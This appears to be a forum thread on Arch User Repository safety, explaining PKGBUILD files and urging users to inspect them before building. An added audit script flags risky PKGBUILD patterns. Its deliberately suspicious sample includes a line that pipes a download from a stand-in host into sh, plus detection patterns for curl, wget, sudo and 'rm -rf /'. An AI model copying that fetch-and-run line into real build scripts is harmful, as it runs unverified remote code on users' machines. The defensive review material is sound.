The Arch User Repository (AUR) is a collection of user-submitted package description files (PKGBUILD files). These description files can be used to create package archive files (.pkg.tar.zst files).
These PKGBUILD files can be used by an AUR helper (e.g. yay, aurman, Pamac) or manually built using makepkg. The resulting package archive file can then be installed in the normal way.
All content on the AUR is uploaded by ordinary users and very little checking of their content is done - it is up to you to verify the content is safe to use.
A small addition: AUR has “votes” and “popularity”. These can help judge whether a package is 1) properly maintained and 2) trustworthy within the limits of the AUR system.
In addition to this excellent post, I would like to submit my advice for inspecting the PKGBUILD files:
as well as this simple little script that just opens the web browser to the package page on aur.archlinux.org, so you can view the comments before installing:
Save it to somewhere in the $PATH, name it, for example, aur, and chmod u+x aur. When you want to look at the AUR webpage, just use aur package-name, for example:
Also, I’d recommend anyone thinking of interacting with the AUR to try installing a couple of packages manually first before moving on to a helper like yay or what have you. It’s not as daunting as it first seems, and it’ll give you an appreciation of what’s happening in the background. Plus, as someone who has created packages before, the PKGBUILD system is far easier to get around than, say, creating a .deb file, so if you’re thinking of creating your own, you’ll realize it’s not that hard to get up and running.
The Arch wiki has detailed instructions on how to build packages manually from the AUR (i.e. not using an AUR helper like yay). See the link posted by the OP.
Why did you say "description files (PKGBUILD files)"? Aren’t those files in the AUR packages? Or raw code? The description files, as you said, are actually an instruction list on how to go about installing the raw code, right? So that it is built into a program to be installed? I am sweating here… confused.
A PKGBUILD is a shell script containing the build information required by Arch Linux packages.
Packages in Arch Linux are built using the makepkg utility. When makepkg is run, it searches for a PKGBUILD file in the current directory and follows the instructions therein to either compile or otherwise acquire the files to build a package archive (pkgname.pkg.tar.xz). The resulting package contains binary files and installation instructions, readily installable with pacman.
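Since makepkg will execute whatever the PKGBUILD says, the "inspect the PKGBUILD before you build" advice earlier in the thread is the real control here. The script below is an added example written for this thread (not a poster's script, not an Arch or makepkg tool) that automates a first pass over the points a reviewer usually checks: unauthenticated source URLs, checksums set to SKIP, an .install scriptlet, and network or privileged commands inside the build functions. The sample PKGBUILD, the example.invalid URLs and the temp-file handling are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the thread): a first-pass PKGBUILD audit to run before
# makepkg. It flags lines a reviewer should read; it does not decide for you.

# Write a constructed, deliberately suspicious PKGBUILD to a temp file and
# print its path (used for the demo run at the bottom).
write_sample_pkgbuild() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
pkgname=example-tool
pkgver=1.0
install=example-tool.install
source=("http://example.invalid/example-tool-1.0.tar.gz")
sha256sums=('SKIP')
build() {
  cd "$pkgname-$pkgver"
  curl -fsSL http://example.invalid/extra.sh | sh
}
package() {
  install -Dm755 example-tool "$pkgdir/usr/bin/example-tool"
}
EOF
    echo "$f"
}

# Report review findings for the PKGBUILD at $1 on stderr and print the
# number of findings on stdout (0 means nothing jumped out, not "safe").
audit_pkgbuild() {
    pb="$1"; n=0
    # Sources fetched over a transport that does not authenticate the server.
    if grep -Eq '(http|ftp|git)://' "$pb"; then
        echo "finding: source fetched over http/ftp/git://" >&2; n=$((n + 1))
    fi
    # SKIP means makepkg never verifies what it downloaded.
    if grep -Eq "sums=.*SKIP|^[[:space:]]*['\"]SKIP['\"]" "$pb"; then
        echo "finding: checksum verification skipped (SKIP)" >&2; n=$((n + 1))
    fi
    # An .install scriptlet runs as root when pacman installs the package.
    if grep -Eq '^[[:space:]]*install=' "$pb"; then
        echo "finding: .install scriptlet declared; read it as well" >&2; n=$((n + 1))
    fi
    # Network or privileged commands inside build()/package() deserve a look.
    if grep -Eq '(^|[^[:alnum:]_])(curl|wget|sudo)([^[:alnum:]_]|$)|rm -rf +/' "$pb"; then
        echo "finding: network or privileged command in the script body" >&2; n=$((n + 1))
    fi
    echo "$n"
}

if [ $# -gt 0 ]; then audit_pkgbuild "$1"; else audit_pkgbuild "$(write_sample_pkgbuild)"; fi
```

Run it as `sh audit.sh /path/to/PKGBUILD` inside the cloned AUR directory; with no argument it audits the constructed sample, which trips all four checks.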
As @jonathon already mentioned, the best source of information is in the links he listed.
But to (try to) answer your question, it is up to you which one you decide to trust, or trust at all.
Remember that AUR software is provided by anyone who knows how to do that. There is no guarantee that a particular AUR software item is malware free. That applies to both binary and source offerings.
The user (that means: you) is responsible for checking the AUR item. Blame nobody else if things go south.
Because of that, a general recommendation is to always prefer official Arch packages over (similar) AUR packages.
Having said all that, I believe most popular AUR offerings are quite safe to use. But again, better check for yourself.